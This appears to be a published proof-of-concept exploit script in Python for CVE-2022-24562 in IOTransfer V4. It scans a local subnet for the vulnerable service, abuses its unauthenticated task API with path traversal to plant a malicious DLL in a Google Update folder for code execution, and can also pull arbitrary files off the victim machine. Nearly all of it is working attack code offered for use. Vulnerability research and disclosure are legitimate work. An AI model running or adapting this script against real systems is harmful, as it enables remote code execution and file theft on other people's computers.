# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE) # Date: 06/22/2022 # Exploit Author: Tomer Peled # Vendor Homepage: https://www.iobit.com # Software Link: https://iotransfer.itopvpn.com/ # Version: V4 and onward # Tested on: Windows 10 # CVE : 2022-24562 # References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562 import os from urllib3.exceptions import ConnectTimeoutError from win32com.client import * import requests import json localPayloadPath = r"c:\temp\malicious.dll" remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll" remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf' Range = "192.168.89" UpOrDown="Upload" IP = "" UserName = "" def get_version_number(file_path): information_parser = Dispatch("Scripting.FileSystemObject") version = information_parser.GetFileVersion(file_path) return version def getTaskList(IP, taskid=""): print("Getting task list...") url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*' res = requests.get(url) tasks = json.loads(res.content) tasks = json.loads(tasks['content']) for task in tasks['tasks']: if taskid == task['taskid']: print(f"Task ID found: {taskid}") def CreateUploadTask(IP): SetSavePath(IP) url = f'http://{IP}:7193/index.php?action=createtask' task = { 'method': 'get', 'version': '1', 'userid': '*', 'taskstate': '0', } res = requests.post(url, json=task) task = json.loads(res.content) task = json.loads(task['content']) taskid = task['taskid'] print(f"[*] TaskID: {taskid}") return taskid def CreateUploadDetailNode(IP, taskid, remotePath, size='100'): url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0' file_info = { 'size': size, 'savefilename': remotePath, 'name': remotePath, 'fullpath': r'c:\windows\system32\calc.exe', 'md5': 'md5md5md5md5md5', 'filetype': '3', } res = requests.post(url, json=file_info) js = json.loads(res.content) print(f"[V] Create Detail returned: {js['code']}") def readFile(Path): file = open(Path, "rb") byte = file.read(1) next = "Start" while next != b'': byte = byte + file.read(1023) next = file.read(1) if next != b'': byte = byte + next file.close() return byte def CallUpload(IP, taskid, localPayloadPath): url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0' send_data = readFile(localPayloadPath) try: res = requests.post(url, data=send_data) js = json.loads(res.content) if js['code'] == 200: print("[V] Success payload uploaded!") else: print(f"CreateRemoteFile: {res.content}") except: print("[*] Reusing the task...") res = requests.post(url, data=send_data) js = json.loads(res.content) if js['code'] == 200 or "false" in js['error']: print("[V] Success payload uploaded!") else: print(f"[X] CreateRemoteFile Failed: {res.content}") def SetSavePath(IP): url = f'http://{IP}:7193/index.php?action=setiotconfig' config = { 'tasksavepath': 'C:\\Program ' } requests.post(url, json=config) def ExploitUpload(IP,payloadPath,rPath,taskid =None): if not taskid: taskid = CreateUploadTask(IP) size = os.path.getsize(payloadPath) CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size)) CallUpload(IP, taskid, payloadPath) def CreateDownloadTask(IP, Path) -> str: url = f'http://{IP}:7193/index.php?action=createtask' task = { 'method': 'get', 'version': '1', 'userid': '*', 'taskstate': '0', 'filepath': Path } res = requests.post(url, json=task) task = json.loads(res.content) task = json.loads(task['content']) taskid = task['taskid'] print(f"TaskID: {taskid}") return taskid def ExploitDownload(IP, DownloadPath, ID=None): if ID: url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}' else: taskid = CreateDownloadTask(IP, DownloadPath) url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}' res = requests.get(url) return res def ScanIP(startRange): print("[*] Searching for vulnerable IPs", end='') Current = 142 IP = f"{startRange}.{Current}" VulnerableIP: str = "" UserName: str = "" while Current < 252: print(".", end='') url = f'http://{IP}:7193/index.php?action=getpcname&userid=*' try: res = requests.get(url, timeout=1) js = json.loads(res.content) js2 = json.loads(js['content']) UserName = js2['name'] VulnerableIP=IP print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}") print(f"[!] Vulnerable PC username: {UserName}") return VulnerableIP,UserName except Exception as e: pass except ConnectTimeoutError: pass IP = f"{startRange}.{Current}" Current = Current + 1 return None,None if __name__ == '__main__': IP,UserName = ScanIP(Range) if IP is None or UserName is None: print("[X] No vulnerable IP found") exit() print("[*] Starting Exploit...") if UpOrDown == "Upload": print(f"[*]Local Payload Path: {localPayloadPath}") print(f"[*]Remote Upload Path: {remotePayloadPath}") ExploitUpload(IP,localPayloadPath,remotePayloadPath) elif UpOrDown == "Download": print(f"[*] Downloading the file: {remoteDownloadPath}") res = ExploitDownload(IP, remoteDownloadPath) file = open("out.pdf", "wb+") file.write(res.content) file.close()